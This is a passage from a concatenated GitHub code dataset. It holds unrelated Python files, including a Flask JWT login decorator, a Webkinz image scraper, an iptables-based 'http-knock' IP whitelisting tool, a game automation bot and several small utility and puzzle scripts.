tlist\n","repo_name":"notanewbie/BRIAN","sub_path":"findtext.py","file_name":"findtext.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"36705384132","text":"from slacker import Slacker\nimport os\nimport jwt\nfrom flask import jsonify, Response, request\nfrom config import SECRET,ALGORITHM, BRANDI_TOKEN, CHANNEL_ID\nfrom functools import wraps \nfrom connection import get_connection\nfrom model.account_dao import AccountDao\n\naccount_dao = AccountDao()\n\ndef login_decorator(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n token = request.headers.get('Authorization', None)\n\n if not token: \n return error_code({'error':'A1041'})\n\n try:\n db_connection = get_connection()\n except Exception as exception:\n return error_code({'error':'A1043'})\n\n try:\n decoded_token = jwt.decode(token, SECRET, ALGORITHM)\n account_id = decoded_token['account_id']\n is_master = account_dao.check_master(db_connection, {'account_id':account_id})\n \n if is_master:\n request.account_id = decoded_token['account_id']\n request.is_master = True\n else:\n request.account_id = decoded_token['account_id']\n request.is_master = False\n \n except jwt.exceptions.DecodeError as exception:\n return error_code({'error':'A1042', 'programming_error':exception})\n finally:\n try:\n if db_connection:\n db_connection.close()\n except Exception as exception:\n return error_code({\"error\":\"C0003\", 'programming_error':exception})\n\n return func(*args, **kwargs) \n return wrapper\n\ndef master_only(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n\n token = request.headers.get('Authorization', None)\n\n if not token: \n return error_code({'error':'A1041'})\n\n try:\n db_connection = get_connection()\n except Exception as exception:\n return error_code({'error':'A1043'})\n\n try:\n decoded_token = jwt.decode(token, SECRET, ALGORITHM)\n account_id = decoded_token['account_id']\n is_master = account_dao.check_master(db_connection, {'account_id':account_id})\n\n if is_master:\n request.account_id = decoded_token['account_id']\n request.is_master = True\n else:\n return error_code({'error':'A1043'})\n\n except jwt.exceptions.DecodeError as exception:\n return error_code({'error':'A1042', 'programming_error':exception})\n return func(*args, **kwargs) \n return wrapper\n\ndef error_code(error_dict):\n \"\"\" 에러코드 및 에러메세지 관리\n args: \n {'error' : \"에러 코드 번호\", 'programming_error: exception} \n Returns: \n Error message & code dictionary\n Authors: 김수정 / 홍성은\n History:\n 2020-10-27 : 초기 생성\n \"\"\"\n codes = {\n # A (Account)\n # 로그인 A1010\n 'A1011' : {'message': 'INVALID USER', 'client_message': '아이디를 확인하세요', 'code': 401}, \n 'A1012' : {'message': 'WRONG PASSWORD', 'client_message': '비밀번호를 확인하세요', 'code': 401}, \n 'A1013' : {'message': 'KEY_ERROR', 'client_message': '필수정보를 입력하세요', 'code': 401}, \n 'A1014' : {'message': 'NOT VALIDATED YET', 'client_message': '입점 승인 후 이용 가능합니다', 'code': 401}, \n\n # 회원가입 1020\n 'A1021' : {'message': 'DUPLICATED_ID', 'client_message': '중복되는 아이디 입니다.', 'code': 409},\n 'A1022' : {'message': 'INVALID_SELLER_INFO', 'client_message': '셀러 정보 없음', 'code': 400},\n 'A1023' : {'message': 'INVALID_MANAGER_INFO', 'client_message': '매니저 정보 없음', 'code': 400}, \n 'A1024' : {'message': 'DUPLICATED_KOREAN_NAME', 'client_message': '셀러명 중복', 'code': 400},\n 'A1025' : {'message': 'DUPLICATED_ENGLISH_NAME', 'client_message': '영문 셀러명 중복', 'code': 400},\n \n\n # 셀러정보보기 1030\n 'A1031' : {'message': 'NO_ACCOUNT', 'client_message': '요청한 셀러 정보 없음', 'code': 400},\n\n # 로그인 데코레이터 A1041\n 'A1041' : {'message': 'NO TOKEN', 'client_message': '로그인 이후 사용 가능합니다.', 'code': 408}, \n 'A1042' : {'message': 'INVALID TOKEN', 'client_message': '로그인 이후 사용 가능합니다.', 'code': 409}, \n 'A1043' : {'message': 'UNAUTHORIZED', 'client_message': '접근 불가능한 페이지입니다.', 'code': 403}, \n \n # 셀러 상태 변경 A1050\n 'A1051' : {'message': 'INVALID_REQUEST', 'client_message': '셀러 상태를 재확인하세요.', 'code': 400}, \n\n # 셀러 리스트 A1060\n 'A1061' : {'message': 'INVALID_PAGE','client_message':'페이지가 유효하지 않습니다.','code':400}, \n 'A1062' : {'message': 'INVALID_PAGE','client_message':'인자가 유효하지 않습니다.','code':400},\n \n # P (Product)\n # 주문하기 2010\n 'P2011' : {'message': 'INVALID_PRODUCT', 'client_message': '조회 불가능한 상품입니다', 'code': 400}, \n 'P2012' : {'message': 'INVALID_PRODUCT', 'client_message': '판매가 종료된 상품입니다', 'code': 400}, \n 'P2013' : {'message': 'INVALID_PRODUCT', 'client_message': '현재 미판매중인 상품입니다', 'code': 400}, \n 'P2014' : {'message': 'INVALID_OPTION_QUANTITY', 'client_message': '옵션과 수량을 다시 선택해 주세요', 'code': 400}, \n 'P2015' : {'message': 'INVALID_QUANTITY', 'client_message': '수량을 조정해주세요', 'code': 400}, \n\n # 상품 상태 변경 2020\n 'P2021' : {'message': 'NO DETAIL REQUEST', 'client_message': '변경 내용을 전송하세요', 'code': 400}, \n \n # O (Order)\n # 주문 상태 변경 3010\n 'O3011' : {'message': 'REQUEST DOES NOT MATCH', 'client_message': '주문의 상태를 다시 확인하세요', 'code': 400}, \n\n\n # C (공통)\n 'C0001' : {'message': 'KEY_ERROR', 'client_message': '필수정보를 입력하세요', 'code': 401}, \n 'C0002' : {'message': 'DB_ERROR', 'client_message': 'DB_Connection 실패', 'code': 501}, \n 'C0003' : {'message': 'DB_ERROR', 'client_message': 'DB_Closing 실패', 'code': 501}, \n 'C0004' : {'message': 'NO_AUTHORIZATION', 'client_message': '마스터 이외 접근 불가', 'code': 400}, \n 'C0005' : {'message': 'KEY_TYPE ERROR', 'client_message': '데이터 타입 확인하세요', 'code': 400}, \n 'C0006' : {'message': 'NO DATA', 'client_message': '데이터를 전송하세요', 'code': 400}, \n 'C0007' : {'message': 'NO_AUTHORIZATION', 'client_message': '셀러 이외 접근 불가', 'code': 400}, \n\n }\n\n if 'programming_error' in error_dict:\n codes[error_dict['error']]['programming_error'] = error_dict['programming_error'].args\n \n return jsonify( codes[error_dict['error']] ), codes[error_dict['error']]['code']\n \ndef check_param(essens_params):\n for key, value in essens_params:\n if key != type(value):\n return {'error':'C0005'}\n\ndef get_filter(db_connection, is_master):\n \"\"\"\n 로그인시 마스터/셀러 구분에 따라 필요한 필터를 return 합니다. \n args: \n is_master : T/F\n Returns: \n 필터\n Authors: 김수정\n History:\n 2020.11.01 : 초기 생성\n \"\"\"\n\n filter_list = [\n {\n 'id': 'sale',\n 'filterTitle': '판매여부',\n 'category': [\n {\n 'category_id': '',\n 'category_title': '전체',\n },\n {\n 'category_id': 1,\n 'category_title': '판매',\n },\n {\n 'category_id': 0,\n 'category_title': '미판매',\n },\n ],\n },\n {\n 'id': 'display',\n 'filterTitle': '진열여부',\n 'category': [\n {\n 'category_id': '',\n 'category_title': '전체',\n },\n {\n 'category_id': 1,\n 'category_title': '진열',\n },\n {\n 'category_id': 0,\n 'category_title': '미진열',\n },\n ],\n },\n {\n 'id': 'discount',\n 'filterTitle': '할인여부',\n 'category': [\n {\n 'category_id': '',\n 'category_title': '전체',\n },\n {\n 'category_id': 1,\n 'category_title': '할인',\n },\n {\n 'category_id': 0,\n 'category_title': '미할인',\n },\n ],\n },\n ]\n\n if is_master:\n filter_list.append(\n {\n 'id': 'seller_name',\n 'filterTitle': '셀러명',\n }\n )\n\n attribute_total = {'category_id':'', 'category_title':'전체'}\n attribute_result = account_dao.get_attributes(db_connection)['attributes']\n\n attributes = attribute_result.insert(0, attribute_total)\n\n filter_list.append(\n {\n 'id': 'attribute',\n 'filterTitle': '셀러속성',\n 'category': attribute_result\n }\n )\n\n return filter_list\n\ndef nav_to_dict(nav_rows):\n \"\"\"\n dao 에서 불러온 네비게이션 바를 가공합니다. \n 작성자: 김수정\n Args:\n db_connection : db\n nav_rows : 네비게이션 바 정보\n Returns:\n \"\"\"\n api_naming = {\n '홈':'home', \n '통계':'', \n '주문관리':'order', \n '취소/환불관리':'', \n '상품관리':'product', \n '고객응대관리':'', \n '기획전/쿠폰관리':'', \n '회원 관리':'account',\n '공지사항':'',\n '정산관리':'',\n '진열관리':''\n }\n \n sub_api_naming = {\n '홈':'',\n '생략':'', \n '전체주문관리':'allOrderList', #성은\n '상품준비관리':'prepareList', #성은\n '배송준비관리':'deliveryPrepareList', #성은 \n '배송중관리':'deliveryList', #성은\n '배송완료관리':'deliveryCompleteList', #성은\n '구매확정관리':'orderConfirmList', #성은\n '상품관리':'', #수정\n '상품등록':'', #성은\n '회원 관리_커뮤니티':'', \n '셀러 계정 관리':'seller', # 성은\n '셀러 정보 관리':'sellerDetail', #수정\n '회원 관리':'',\n '페널티 셀러 관리':'',\n '도매처 관리':''\n }\n\n nav_list = []\n nav_index = []\n for row in nav_rows:\n\n if row['menu_id'] not in nav_index:\n temp_dict = {}\n temp_dict['id'] = row['menu_id']\n temp_dict['menu_title'] = row['menu']\n temp_dict['main_url'] = api_naming[row['menu']]\n temp_dict['sub_menus'] = [\n {\n 'sub_menu_id' : row['sub_menu_id'], \n 'sub_menu_title': row['sub_menu'], \n 'sub_url':sub_api_naming[row['sub_menu']]\n }\n ]\n \n nav_index.append(row['menu_id'])\n nav_list.append(temp_dict)\n \n else:\n index = nav_index.index(row['menu_id']) \n nav_list[index]['sub_menus'].append(\n {\n 'sub_menu_id' : row['sub_menu_id'], \n 'sub_menu_title':row['sub_menu'], \n 'sub_url':sub_api_naming[row['sub_menu']]\n }\n )\n\n return nav_list\n\ndef send_slack(buyer_name, product_name, status_name):\n \"\"\"\n 주문의 배송상태가 변경될 때마다 slack 메세지를 전송합니다. \n Args:\n buyer_name : 주문자 명\n product_name : 상품명\n status_name : 현재 상품의 배송상태\n Author : 김수정\n History: \n 2020-11-01: 초기생성\n \"\"\"\n slack = Slacker(BRANDI_TOKEN)\n\n msg = f\"\"\"{buyer_name} 님이 주문하신 상품 안내 드립니다.\n 상품명 : {product_name}\n 상태 : {status_name}\n -브랜디 \"\"\"\n\n slack.chat.post_message(CHANNEL_ID, msg)","repo_name":"jake-hong/brandi_backend","sub_path":"brandi/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12304,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34808110989","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nrequirements_lines = [line.strip() for line in open('requirements.txt')\n .readlines()]\ninstall_requires = list(filter(None, requirements_lines))\n\nif sys.argv[-1] == 'publish':\n os.system('python setup.py sdist upload')\n sys.exit()\n\nreadme = open('README.md').read()\nhistory = open('HISTORY.md').read().replace('.. :changelog:', '')\n\nsetup(\n name='trellostats',\n version=0.4,\n description='Trello stats for winners.',\n long_description=readme + '\\n\\n' + history,\n author='Ben Hughes',\n author_email='bwghughes@gmail.com',\n url='https://github.com/actionagile/trellis',\n include_package_data=True,\n install_requires=install_requires,\n license=\"BSD\",\n zip_safe=False,\n keywords=['trello', 'cycle_time'],\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 2.7',\n ],\n entry_points={\n 'console_scripts':\n ['trellostats=cli:cli']\n }\n\n)\n","repo_name":"ActionAgile/trellis","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73845038480","text":"import sys\nsys.dont_write_bytecode = True\nfrom utils import *\n\n\npuzzle = open('puzzle/06.in').read().splitlines()\npoints = [tuple(ints(line)) for line in puzzle]\nmin_y, max_y = min_max(lmap(fst, points))\nmin_x, max_x = min_max(lmap(snd, points))\n\ny_range = range(min_y-100, max_y+101)\nx_range = range(min_x-100, max_x+101)\ngrid = dict.fromkeys(cord for cord in itertools.product(y_range, x_range))\nfor cord in itertools.product(y_range, x_range):\n distances = defaultdict(list)\n for point in points:\n distances[pdist1(cord, point)].append(point)\n min_distance = min(distances)\n if len(distances[min_distance]) == 1:\n grid[cord] = distances[min_distance][0]\ninfinite = set.union(\n set(grid[(y, 0)] for y in y_range),\n set(grid[(y, max_x)] for y in y_range),\n set(grid[(0, x)] for x in x_range),\n set(grid[(max_y, x)] for x in x_range)\n)\ncounter = Counter(val for val in grid.values() if val not in infinite)\nprint(*counter.items(), sep='\\n')\n","repo_name":"filipmlynarski/Advent-of-Code","sub_path":"2018/06.py","file_name":"06.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"43495369225","text":"from time import sleep\nfrom move_window_left import run\nfrom mss import mss\nfrom PIL import Image\nimport pyautogui\nimport numpy as np\nimport cv2.cv2 as cv2\n\n\ndef find_white(original_image):\n image_str = np.asarray(original_image)\n gray = cv2.cvtColor(image_str, cv2.COLOR_BGR2GRAY)\n ret, threshold1 = cv2.threshold(gray, 240, 255, cv2.THRESH_BINARY)\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (20, 1))\n closed = cv2.morphologyEx(threshold1, cv2.MORPH_CLOSE, kernel)\n closed = cv2.erode(closed, kernel, iterations=1)\n closed = cv2.dilate(closed, kernel, iterations=1)\n return closed\n\n\nframe = {'top': 92, 'left': 440, 'width': 80, 'height': 18}\nsct = mss()\n\ndef screen_record():\n while (True):\n sct.get_pixels(frame)\n img = Image.frombytes('RGB', (sct.width, sct.height), sct.image)\n new_screen = find_white(img)\n winname = \"Test\"\n cv2.namedWindow(winname)\n cv2.moveWindow(winname, 1450, 100)\n cv2.imshow(winname,new_screen)\n n_white_pix = np.sum(new_screen == 255)\n if cv2.waitKey(25) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n break\n return n_white_pix\n\ndef movement_of_the_player():\n while True:\n pix = screen_record()\n if pix>10:\n pyautogui.press('q')\n\n\n\ndef entry():\n run()\n sleep(5)\n pyautogui.click(648,468,duration=0.2)\n pyautogui.click(648,468,duration=0.2)\n sleep(10)\n pyautogui.click(810,433,duration=0.2)\n pyautogui.click(810,433,duration=0.2)\n\ndef main():\n entry()\n movement_of_the_player()\n\nif __name__ == '__main__':\n main()","repo_name":"easygame-team/Path_of_Exile","sub_path":"assault.py","file_name":"assault.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22792085593","text":"import time\nimport random\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom PIL import Image\n\nURL = \"http://webkinzpictureguide.shoutwiki.com/wiki/User:Gifted9/flooring\"\nURL1 = \"http://webkinzpictureguide.shoutwiki.com/wiki/User:Gifted9/wallpaper\"\npage = requests.get(URL)\n\nsoup = BeautifulSoup(page.content, 'html.parser')\ntables = soup.findChildren('table')\nmy_table = tables[0]\n\nrows = my_table.findChildren(['tr'])\n\ntot = 0\nfor row in rows:\n tds = row.findChildren('td')\n for td in enumerate(tds):\n tot += 1\nprint(tot)\n\n\ncount = 0\nwith open('wallpapers.csv', 'w') as f:\n\n for row in rows:\n tds = row.findChildren('td')\n wallpaperName = \"1st\"\n\n for index, td in enumerate(tds):\n try:\n if (index == 0):\n wallpaperName = td.findChildren('p')[0].text.strip()\n\n img_name = wallpaperName.replace(\" \", \"\")\n\n if (index == 0):\n img_name\n elif (index == 1):\n img_name += f\"Small\"\n elif (index == 2):\n img_name += f\"Medium\"\n elif (index == 3):\n img_name += f\"Large\"\n\n img = td.findChildren('a')[0]\n image_url = \"http://webkinzpictureguide.shoutwiki.com\" + img['href']\n # print(image_url)\n\n # Open the new page to get the highres photo\n time.sleep(0 + random.uniform(0.1, 0.2)) # not to overload the server\n page2 = requests.get(image_url)\n soup_img = BeautifulSoup(page2.content, 'html.parser')\n\n fullImage = soup_img.find_all(\"td\", class_=\"filehistory-selected\")[0]\n # print(fullImage)\n\n img_link = fullImage.findChildren(\"a\")[0][\"href\"]\n print(img_link)\n\n img = Image.open(requests.get(img_link, stream=True).raw)\n\n img.save(f'./Flooring/{img_name}.png')\n count += 1\n\n except Exception as e:\n print(e)\n time.sleep(4 + random.uniform(0.3, 0.8)) # not to overload the server\n\nprint(f\"Done, downloaded {count} images\")\n","repo_name":"Awolize/Webkinz-room-previewer","sub_path":"webscraper.py","file_name":"webscraper.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27968541274","text":"#!/usr/bin/env python3\nfrom flask import Flask, render_template, request\nimport subprocess\nimport socket\nimport configparser\nimport argparse\n\nimport pprint\nimport logging \nfrom logging import StreamHandler, FileHandler\n\n\napp = Flask(__name__)\n\n# read configuration file. Default file name is config.ini\ndef read_config(config_file):\n global cfg\n logger.info(\"Reading configuration file : %s\", config_file)\n cfg = configparser.ConfigParser()\n cfg.read(config_file)\n if cfg.has_section('global') is False:\n logger.error(\"Configuration file '%s' does not exits\", config_file)\n exit()\n\ndef iptables_uninstall_rules():\n logger.debug(\"iptables_uninstall_rules()\")\n logger.debug(\"Removing iptables rules\")\n rc = subprocess.run(['iptables', '-F', cfg['iptables']['chain_name'] ])\n rc = subprocess.run(['iptables', '-D', 'INPUT', '-i', cfg['iptables']['interface'], '-p', 'tcp', '-m', 'multiport', '--dport', cfg['iptables']['protected_ports'], '-j', cfg['iptables']['chain_name'] ])\n rc = subprocess.run(['iptables', '-X', cfg['iptables']['chain_name']] )\n exit()\n\ndef iptables_install_rules():\n logger.debug(\"iptables_install_rules()\")\n logger.debug(\"Installing iptables rules\")\n authorized_ip_list = cfg['iptables']['authorized_ip'].split(',')\n rc = subprocess.run(['iptables', '-N', cfg['iptables']['chain_name'] ] )\n rc = subprocess.run(['iptables', '-I', cfg['iptables']['chain_name'], '-m', 'state', '--state', 'NEW', '-j', 'LOG', '--log-prefix', 'HTTP-KNOCK - ', '--log-level', 'info'])\n for ip in authorized_ip_list:\n rc = subprocess.run(['iptables', '-I', cfg['iptables']['chain_name'], '-s', ip, '-j', 'ACCEPT'] )\n rc = subprocess.run(['iptables', '-A', cfg['iptables']['chain_name'], '-j', 'DROP' ])\n rc = subprocess.run(['iptables', '-I', 'INPUT', '-i', cfg['iptables']['interface'], '-p', 'tcp', '-m', 'multiport', '--dport', cfg['iptables']['protected_ports'], '-j', cfg['iptables']['chain_name'] ])\n\ndef iptables_check_rules():\n logger.debug(\"iptables_check_rules()\")\n rc = subprocess.run(['iptables', '-L', cfg['iptables']['chain_name'], '-n'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n if (rc.returncode != 0):\n logger.info(\"The firewall chain %s was not found. Creating the rules\", cfg['iptables']['chain_name'] )\n iptables_install_rules()\n else:\n logger.debug(\"Chain %s found\", cfg['iptables']['chain_name'] )\n \n\ndef iptables_display_status():\n logger.debug(\"iptables_display_status()\")\n print(\"\\nThe current firewall rules are:\\n\")\n rc = subprocess.run(['iptables', '-L', \"INPUT\", '-n'] )\n print(\"------\")\n rc = subprocess.run(['iptables', '-L', cfg['iptables']['chain_name'], '-n'] )\n\ndef iptables_get_allowed_rules():\n logger.debug(\"iptables_get_allowed_rules()\")\n result = subprocess.run(['iptables', '-L', cfg['iptables']['chain_name'], '--line-numbers', '-n'], capture_output = True, text = True)\n lines = result.stdout.splitlines()\n logger.debug(\"The current firewall rules are:\")\n ret = \"\\n\"\n logger.debug(f'\\n{ret.join(lines)}')\n return lines\n\ndef iptables_add_ip_allowed_rules(ip):\n logger.debug(\"iptables_add_ip_allowed_rules(%s)\", ip)\n result = subprocess.run([\"iptables\", \"-I\", cfg['iptables']['chain_name'], \"-s\", ip, \"-j\", \"ACCEPT\"])\n return result\n \n# get the last n lines of the f file\ndef tail(f, n, offset=0):\n proc = subprocess.run([ 'tail', '-n', n + offset, f ],capture_output = True)\n lines = proc.stdout.readlines()\n return lines[:, -offset]\n \n@app.route('/')\ndef root_page():\n found = False\n\n rules = iptables_get_allowed_rules()\n for rule in rules:\n if request.access_route[0] in rule:\n found = True\n\n if (found is False):\n logger.info(\"Adding IP to allowed list: %s\", request.access_route[0])\n iptables_add_ip_allowed_rules(request.access_route[0])\n \n last_conn_hostname = list()\n if (cfg.getboolean('global','activity_enable')):\n last_failed_connction_attempts = subprocess.run(\"tail -n %s %s | sed -n 's/\\\\(.* ..:..:..\\\\) .*SRC=\\\\(.*\\\\) DST.*/\\\\1,\\\\2/p'\" %(cfg['global']['activity_size'], cfg['global']['activity_logfile'] ) , capture_output = True, shell = True, text = True).stdout.splitlines()\n \n for attempt in last_failed_connction_attempts:\n try:\n (time, ip) = tuple(attempt.split(','))\n hostname = socket.gethostbyaddr(ip)[0]\n except OSError as e:\n hostname = \"Error: %s\" %(e.strerror)\n \n last_conn_hostname.append( (time, ip, hostname) )\n \n return render_template('index.html', IP = request.access_route[0], found = found, debug = args.debug , headers = request.headers, request = vars(request), activity_enable=cfg.getboolean('global','activity_enable') ,last_conn = last_conn_hostname)\n\ndef parse_args():\n\n parser = argparse.ArgumentParser(description='Open TCP ports with http requests')\n\n parser.add_argument(\"--fw-clear\", action='store_true',help = \"Clear the firewall\")\n parser.add_argument(\"--config-file\", default=\"./config.ini\", metavar='/some/file', help = \"File where configuration is stored\")\n parser.add_argument(\"--fw-status\", action='store_true',help = \"Display the firewall status\")\n parser.add_argument(\"--debug\", action='store_true', help = \"Enable debugging messages\")\n parser.parse_args() \n return parser.parse_args()\n\n\npp = pprint.PrettyPrinter(indent=2)\n\nlogger = logging.getLogger('log')\n \n\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s', datefmt='%Y%m%d %H:%M:%S')\nformatter = logging.Formatter('%(levelname)s %(asctime)s - %(message)s', datefmt='%H:%M:%S')\n\nhandler_stderror = StreamHandler()\nhandler_stderror.setLevel(logging.DEBUG)\nhandler_stderror.setFormatter(formatter)\n\nhandler_file = FileHandler(\"http-knock.log\")\nhandler_file.setLevel(logging.DEBUG)\nhandler_file.setFormatter(formatter)\n\nlogger.addHandler(handler_stderror)\nlogger.addHandler(handler_file)\nprint(\"\")\nprint(\"-\")\n\nargs = parse_args()\nif (args.debug == True):\n logger.setLevel(logging.DEBUG)\n\n\nread_config(args.config_file)\nif (args.fw_status == True):\n iptables_display_status()\n exit()\n \nif (args.fw_clear == True):\n iptables_uninstall_rules()\n exit()\n\niptables_check_rules()\n\n\n\nif __name__ == '__main__':\n app.run(cfg['global']['http_knock_listen_ip'], cfg['global']['http_knock_port'])\n","repo_name":"redge76/http-knock","sub_path":"http-knock.py","file_name":"http-knock.py","file_ext":"py","file_size_in_byte":6458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20516175956","text":"import pytest\nfrom datetime import datetime\nfrom random import random\nimport time\n\n\n@pytest.fixture(autouse=True)\ndef check_duration(request, cache):\n key = 'duration/' + request.node.nodeid.replace(':', '_')\n\n start_time = datetime.now()\n yield\n stop_time = datetime.now()\n this_duration = (stop_time - start_time).total_seconds()\n last_duration = cache.get(key, None)\n cache.set(key, this_duration)\n if last_duration is not None:\n error_string = 'test duration over 2x last duration'\n assert this_duration <= last_duration * 2, error_string\n\n\n@pytest.mark.parametrize('i', range(5))\ndef test_slow_staff(i):\n time.sleep(random())\n","repo_name":"pawelszopa/test_tasks_pytest","sub_path":"tests/examples/test_slower.py","file_name":"test_slower.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28894762078","text":"from pickle import FALSE\nfrom . import media\nfrom . import app\nimport json\n\n\n# config filepath that you want to add\n# example\n\nconfig = {}\ntry:\n with open( app.root_path + '/bin/config.json', 'r') as f:\n config = json.load(f)\nexcept:\n config = {\n \"paths\":\n [\n \n ]\n }\n with open( app.root_path + '/bin/config.json', 'w') as f:\n json.dump(config, f)\n\nfor path in config['paths']:\n media.add_media(path['path'],path['name'], path['unstructured'])\n\n\n\ndef AddPath(path, name, unstructured=True):\n config['paths'].append(\n {'path':path,'name':name, 'unstructured':unstructured}\n )\n media.add_media(path, name,unstructured)\n print(path, unstructured)\n try:\n with open( app.root_path + '/bin/config.json', 'w') as f:\n json.dump(config, f)\n media.reindex\n return True \n \n except:\n return False\n \n\n\n \n\n","repo_name":"ivan-tana/MadiaLib-api","sub_path":"api/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42225866850","text":"N = int(input())\nadjList = {i + 1: [] for i in range(N)}\n\n\ndef solve(start, end):\n visited = set()\n que = [(start, 0)]\n\n while len(que) > 0:\n n = que.pop(0)\n if n[0] == end:\n return n[1]\n\n visited.add(n[0])\n for i in adjList[n[0]]:\n if i not in visited:\n que.append((i, n[1] + 1))\n return -1\n\n\nfor i in range(N):\n pages = list(map(int, input().split()))\n adjList[i + 1].extend(pages)\n\nstart, end = list(map(int, input().split()))\n\n# print(adjList)\n# print(s, e)\n\nprint(solve(start, end))\n","repo_name":"mARTin-369/CodeVita-2022","sub_path":"vita1.py","file_name":"vita1.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35454891904","text":"import carla\nimport random\n\n# Connect to the client and retrieve the world object\nclient = carla.Client('192.168.1.10', 2000)\nworld = client.get_world()\n\n# Set up the simulator in synchronous mode\nsettings = world.get_settings()\nsettings.synchronous_mode = True # Enables synchronous mode\nsettings.fixed_delta_seconds = 0.01\nworld.apply_settings(settings)\n\n# Set up the TM in synchronous mode\ntraffic_manager = client.get_trafficmanager()\ntraffic_manager.set_synchronous_mode(True)\n\n# Set a seed so behaviour can be repeated if necessary\ntraffic_manager.set_random_device_seed(0)\nrandom.seed(0)\n\n# We will aslo set up the spectator so we can see what we do\nspectator = world.get_spectator()\n\n\nspawn_points = world.get_map().get_spawn_points()\n\n\n# Draw the spawn point locations as numbers in the map\nfor i, spawn_point in enumerate(spawn_points):\n world.debug.draw_string(spawn_point.location, str(i), life_time=1000)\n\n# In synchronous mode, we need to run the simulation to fly the spectator\nwhile True:\n world.tick()","repo_name":"ushiu1230/Self-Driving-Car-with-SSDLiteMobileNetV3-and-Lidar","sub_path":"Map_Plaining.py","file_name":"Map_Plaining.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24118938853","text":"import level\r\nimport magic_number\r\nimport Account\r\nimport searchuser as sc\r\ndef Menu(Uname,AccBalance):\r\n print(\"Welcome back\\nUsername:\",Uname,\"\\nAccount Balance:\",AccBalance)\r\n print(\"#############################__MENU__##############################\")\r\n print(\"1- NEW GAME\")\r\n print(\"2- Instructions\")\r\n print(\"3- Logout\")\r\n choice=int(input(\"Enter your choice here: \"))\r\n while(choice!=1 and choice!=2 and choice!=3):\r\n print(\"invalid choice\")\r\n choice=int(input(\"enter a valid selection: \"))\r\n if(choice == 1):\r\n magic_number.game_party(level.level(), AccBalance, Uname)\r\n elif(choice == 2):\r\n magic_number.game_description(Uname, AccBalance)\r\n else:\r\n if Account.start()==1:\r\n sc.login(Account.Login())\r\n elif Account.start()==2:\r\n sc.registration(Account.Register())\r\n else:\r\n exit(0)","repo_name":"Mikelbernard12/PycharmProjects","sub_path":"magicNumber/Menu.py","file_name":"Menu.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"605506117","text":"import os\nimport sys\nfrom flask import Flask\nimport os\nfrom azure.storage.blob import BlobServiceClient, __version__\n\n\nroot_folder = os.path.abspath(os.path.dirname(\n os.path.dirname(os.path.abspath(__file__))))\nsys.path.append(root_folder)\napp = Flask(__name__)\napp.config.from_object('config')\nstorage_account_connection_string = app.config[\"STORAGE_ACCOUNT_CONNECTION_STRING\"]\n\nblob_service_client = BlobServiceClient.from_connection_string(storage_account_connection_string)\n\ndef create_container(container_name: str):\n blob_service_client.create_container(container_name)\n\ndef upload_file(container_name: str, local_file_name: str, full_path_file: str):\n blob_client = blob_service_client.get_blob_client(container=container_name, blob=local_file_name)\n\n with open(full_path_file, \"rb\") as data:\n blob_client.upload_blob(data)\n return blob_client.url\n\ndef download_file(container_name: str, local_directory: str, full_path_file: str):\n head, file_name = os.path.split(full_path_file)\n print(\"file_name: \")\n print(file_name)\n file_dir = os.path.join(local_directory, container_name)\n if not os.path.exists(file_dir):\n os.makedirs(file_dir)\n download_file_path = os.path.join(file_dir, file_name)\n print(\"download_file_path: \")\n print(download_file_path)\n blob_client = blob_service_client.get_blob_client(container=container_name, blob=file_name)\n\n with open(download_file_path, \"wb\") as download_file:\n download_file.write(blob_client.download_blob().readall())\n\n return download_file_path","repo_name":"soadcam/azure_bizagi_project","sub_path":"backend/utility/blob_storage.py","file_name":"blob_storage.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1977196303","text":"#coding: UTF-8\nimport fileinput\nfrom gensim.models.doc2vec import Doc2Vec\nimport sys\nimport numpy as np\nfrom nltk.stem.porter import PorterStemmer as PS\nimport re\n\n\nargs = sys.argv\ndecimal_pattern = re.compile(r'[0-9]+')\nps = PS()\n\nmodel = Doc2Vec.load(args[1])\n\n# header\nprint(\"path\", \"name1\", \"name2\", \"range\", \"semantic_similarity\", 